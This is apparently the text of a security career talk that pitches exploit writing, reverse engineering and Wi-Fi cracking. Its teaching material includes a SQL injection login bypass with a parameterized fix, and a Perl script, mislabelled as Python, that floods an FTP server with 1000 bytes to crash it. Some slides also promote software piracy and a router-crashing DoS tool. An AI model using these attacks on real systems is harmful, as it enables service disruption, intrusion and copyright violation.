Life Beyond Ethical Hacking
“The Actual Information Security”   By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)
Acknowledgements

• Dr. H.S Johal
• Ms. Himanshi
Lil About My Self

• Certified With C|EH, CISE, AFCEH
• Associated With over 9 Companies
• Ambassador, EC-COUNCIL
• Creator Of India’s First DLP on Web Application Penetration Testing Course
• Student @ LPU :-)
• Tested Over 90+ Servers
• Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
Let's Go Old School, What is Ethical Hacking?

• Breaking Into Devices, Networks Legally.
• Securing Servers, Recovering Emails etc.
• But the Question Remains!
• Where to get these jobs?
Jobs And Stats
Why More Jobs and Less People?

• Emerging Technology
• Still Register Work
• Don’t want to spend money
• Find it too difficult
• People feel they can learn hacking in a 2 days workshop :-P
• No proper facilities for the required courses
Salary Packages

• Normal B.Tech : 300K-400K
• BPO          : 100K-250K
• DEVELOPMENT  : 300K-700K
• SECURITY     : 600K-1300K
Beyond So Called “Ethical Hacking”

• Web Application Penetration Testing
• Exploit Writing
• Reverse Engineering
• Malware Analysis
• Computer Forensics
• Protocol Analysis
Why To Go Beyond Ethical Hacking?

Jobs For Ethical Hacker:
• Trainer
• Trainer
• Trainer
• Trainer
• And Trainer
• Salary Around: 15K + Incentives
Jobs Beyond Ethical Hacking:

Jobs For Hackers:
• Researchers
• Technical Heads
• Penetration testers
• Forensic Investigators
• Salary Around: 300-400K Per Month :-)
Benefits :-( of not Being a Hacker
Benefits :-) of Being a Hacker

        I M UR WORST NIGHTMARE :-P
How To Let Your Dreams Come True?

Some Highly Paid Fields:
• WAPT – Involves testing of web applications, websites, servers, and source code auditing.
• Exploit Writing – Finding vulnerabilities in software and possibly exploiting the software.
• Reverse Engineering – Software cracking, patches, modifying features of an end product
How To Let Your Dreams Come True?

Some Highly Paid Fields:
• Wireless Testing – Involves network security infrastructure build up, managing networks, system administration etc.
• Projects – Good at coding? Show it to the whole world.
• Forensics – Highest paid job in the entire list :-) Takes a lot, and pays a lot
Why We Need More People ?




                            Source: Indian Express
Why We Need More People ?




                            Source: Times Of India
Host Gator Hacked !! 3 Lac Websites
        Owned By Hackers




                                      Source: SoftPedia
Host Gator Hacked !! 3 Lac Websites
     Owned By Hackers Contd..




                                      Source: Private
Norton India Hacked !!




                         Source: Private
Norton India’s Database Hacked !!




                                    Source: Private
Norton India’s Database Hacked !!




                                    Source: Private
The Biggest Of All… Anonymous!!




                                  Source: National Post
Now Beyond The Word ‘Ethical’

Web Application Penetration Testing:
• Find bugs in web applications – custom made, open source applications.
• Bugs which may compromise the security, make it vulnerable, or help an attacker steal sensitive information
• Now how to perform 1 out of 300 tests in a web application pen test?
• Let's see a simple example – SQL Injection Bypass
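The SQL injection bypass named on this slide, as an added example that is not from the original deck: a login check that concatenates input into the query, beside one that binds it as a parameter. The table, the account and the function names are constructed for illustration, and the unsalted SHA-256 hash is a shortcut to keep the example short.

```python
import hashlib
import hmac
import sqlite3


def pw_hash(password):
    # Unsalted SHA-256 keeps the demo short; use a salted password KDF in real systems.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def make_db():
    """In-memory user table holding one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", pw_hash("correct horse")))
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Builds the SQL text from user input, so input can change the query's structure."""
    query = (
        "SELECT username FROM users "
        "WHERE username = '" + username + "' AND pw_hash = '" + pw_hash(password) + "'"
    )
    try:
        return db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # a stray quote breaks the statement instead of logging in


def login_hardened(db, username, password):
    """Passes input as a bound parameter; the SQL text never changes."""
    row = db.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    # Constant-time comparison of the stored and the computed hash.
    return hmac.compare_digest(row[0], pw_hash(password))


def run_cases():
    """Run the same constructed inputs through both login checks."""
    db = make_db()
    cases = [
        ("alice", "correct horse"),  # valid credentials
        ("alice", "wrong"),          # wrong password
        ("alice' --", "wrong"),      # quote + comment cuts off the password check
        ("o'brien", "x"),            # ordinary name containing a quote
    ]
    return [(u, login_vulnerable(db, u, p), login_hardened(db, u, p)) for u, p in cases]


if __name__ == "__main__":
    for user, vuln, hard in run_cases():
        print(f"{user!r:14} vulnerable={vuln!s:5} hardened={hard}")
```

The third case is the bypass: the concatenated query accepts a wrong password, while the parameterized query treats the whole string as a username that does not exist.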
Rise Of The Web Applications
Fasten Your Seat Belts, It's Showtime




   DEMO
Now Beyond The Word ‘Ethical’

Exploit Writing
• Potentially writing code to exploit a vulnerability.
• Highly paid, as software is vulnerable to exploits, which may further lead to compromise of the entire system.
• Requirement: C, C++, Perl, Python, Ruby, Assembly language
Now Beyond The Word ‘Ethical’

Simplest of The Exploit in Python - Crashing A Secure Port FTP Server

# Perl script: opens a TCP connection to the target and sends 1000 "A" bytes.
use strict;
use warnings;
use Socket;

my $junk  = "\x41" x 1000;              # 1000 x 'A' (0x41)
my $host  = shift || '192.168.15.1';    # target host (first argument)
my $port  = shift || 200;               # target port (second argument)
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host) or die "cannot resolve $host";
my $paddr = sockaddr_in($port, $iaddr);
print "[+] Setting up socket\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk."\n";
print "[+] Payload sent\n";
close SOCKET or die "close: $!";
Now Beyond The Word ‘Ethical’


      Prices for Various Exploits
Now Beyond The Word ‘Ethical’

Reverse Engineering
• Editing the final software to find serial keys, stop the online authentications,
• Mostly used by pirates
• Sometimes used to edit the features of a final software
• Make your life easier with free products :-)
Now Beyond The Word ‘Ethical’


              Wireless Penetration Testing
•   Involves Auditing of Network Security Over
    Wireless
•   Installation of Servers And Security Devices
•   Crack proofing Wireless Passwords
•   Highly paid
•   Requires Networking Background
INSANITY WIFI CRACKER


                Insanity Wi-fi Cracker
•   Developed By me and my Friends for minor
    project
•   Automates the cracking of various wifi securities
•   Performs self MITM attack
•   DOS Service Can Crash the Routers For Ever :-P
•   Even an 8 Years old can press the button ‘c’ for
    cracking and no. for a particular AP to crack
Wi-fi Cracking At a Click Of a Button




  DEMO
So A One Last Question , Wanna go this ?
Or Wanna Go This ?
After All
It’s your Career
 |Handle it with care|
Any Questions ?
Contact

Email :
info@nipunjaswal.com
www.nipunjaswal.com
www.facebook.com/nipun.jaswal
www.hatcon.in
www.hcf.co.in
www.starthack.com
www.cyber-rog.com/h3ll
www.pentest.co.in
